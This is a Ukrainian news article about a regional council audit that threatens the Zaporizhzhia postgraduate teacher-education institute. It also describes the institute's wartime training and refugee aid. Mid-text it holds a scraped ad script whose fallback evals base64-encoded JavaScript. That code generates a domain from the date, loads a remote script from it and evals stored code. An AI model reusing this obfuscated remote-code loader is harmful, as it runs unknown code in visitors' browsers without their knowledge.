Освітян Запорізької області хочуть позбавити єдиного регіонального інституту післядипломної освіти

Освітян Запорізької області хочуть позбавити єдиного регіонального інституту післядипломної освіти.

Запорізький обласний інститут післядипломної педагогічної освіти є єдиним закладом в області, який опікується педагогами усіх ланок освіти як у мирний час, так і у стані війни. Зараз у ньому проводять перевірки, які викликають занепокоєння у педагогів усього Запорізького регіону.

“Акцент” дослідив питання перевірок ЗОІППО.

22 червня на засіданні координаційно-дорадчої ради з питань управління об’єктами спільної власності територіальних громад сіл, селищ, міст Запорізької області при голові обласної ради було ухвалено рішення про проведення перевірки діяльності чотирьох комунальних підприємств та закладів, до яких потрапив Запорізький обласний інститут післядипломної педагогічної освіти та три інші заклади, які наразі не працюють.

Голова облради Олена Жук того дня натякнула на “оптимізацію” закладів, на роботу яких не вистачає бюджетних коштів. Фактично такая заява — це попередження або про звільнення працівників, або про ліквідацію закладу.

Відповідь на це питання – це оптимізація. І це важливе і непопулярне рішення, яке ми повинні будемо ухвалювати”, – наголосила вона.

Педагоги області були здивовані, бо дізналися про це з публікації на сайті облради. Крім того, на самому засіданні питання закладу не піднімалося, воно фактично було вписане у текст постфактум.

На сьогодні, перевірка ЗОІППО вже відбулась, незважаючи на чинну Постанову Уряду про припинення перевірок під час воєнного стану. За її результатами порушень з основних видів діяльності інституту не встановлено. Проте комісією зроблений висновок про невідповідність Статуту інституту вимогам Закону України “Про вищу освіту”.

І тут виникає цікаві запитання: Чому обласна рада з 2014 року не затвердила новий Статут свого комунального закладу, адже колектив щорічно подавав на затвердження нові редакції цього документу? Чому обласною радою до сих пір не було виконане рішення апеляційного адміністративного суду 2017 року щодо приведення у відповідність статутних документів інституту, що є її прямим обов’язком?

І в умовах цієї неоднозначної ситуації координаційно-дорадча рада швидкими темпами, поспіхом, не чекаючи на затвердження у найближчий час профільного Закону України “Про освіту дорослих”, планує прийняти рішення щодо статусу та подальшої долі інституту, а відтак, — і професійного розвитку всіх педагогів Запорізької області.

Чому ЗОІППО — надважливий заклад для освіти Запорізької області
var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Запорізький обласний інститут післядипломної педагогічної освіти у стані війни фактично тримає освітній фронт разом з усіма педагогами, у тому числі, які залишилися на окупованих територіях. У цьому закладі вчителі безкоштовно підвищують свою професійну кваліфікацію та отримують знання щодо впровадження реформи “Нова українська школа”, новий етап якої стартує у вересні.

У кожній області є один заклад такого профілю, і всюди їх роботу влада намагається всебічно підтримувати та розвивати. Лише на Запоріжжі, коли інститут критично завантажений роботою з вчителями та допомогою біженцям, його знецінюють та демонструють недовіру.

За час війни інститут жодного дня не припиняв свою роботу. За загально педагогічним напрямом проведено навчання близько 9840 педагогів Запорізької області. Проведена підготовка більше 1900 вчителів початкової школи, базової середньої освіти та керівників закладів освіти до роботи в умовах Нової української школи.

Інститут надає прихисток біженцям та допомогу освітянам

В Інституті, крім основної освітньої діяльності, з початку березня розгорнуто гуманітарний хаб для людей із зони активних бойових дій, метою якого стало надання першої необхідної допомоги вимушеним переселенцям. За час війни тут знайшли тимчасовий прихисток більше 800 осіб із Запорізької, Донецької, Луганської, Херсонської, Миколаївської областей, серед яких 140 дітей.

Для них силами працівників інституту та волонтерів було організовано безкоштовне гаряче харчування, комфортні умови проживання, можливість обрати сезонний одяг на перший час, засоби гігієни, набір продовольчих товарів, тощо.

На теперішній час в гуртожитку на постійній основі мешкають 34 внутрішньо переміщені особи, які потребують постійного медичного лікування, мають серйозні хронічні хвороби. Їм надається комплексна психосоціальна підтримка, організоване консультування лікарів, фахівців соціальних служб.

Працівники інституту постійно тримають контакт з освітянами з тимчасово окупованих територій Запорізької області, надаючи їм психологічну та професійну підтримку, допомагають збирати кошти для колег, які вступили до лав ЗСУ тощо. Наразі відомо, що саме у Запорізькій області багато педагогів відмовилися від співпраці з окупантами. Це один з прикладів того, як Запорізький обласний інститут післядипломної педагогічної освіти тримає свій фронт.

Освітяни Запорізької області та працівники закладу сподіваються, що обласна влада та чиновники не мають наміру знищити єдиний регіональний інститут післядипломної педагогічної освіти. Вони хочуть надалі тримати свій освітянський фронт та наближати перемогу України на своєму місці.
(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/osvityan-zaporizkoyi-oblasti-hochut-pozbaviti-yedinogo-regionalnogo-institutu-pislyadiplomnoyi-osviti/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top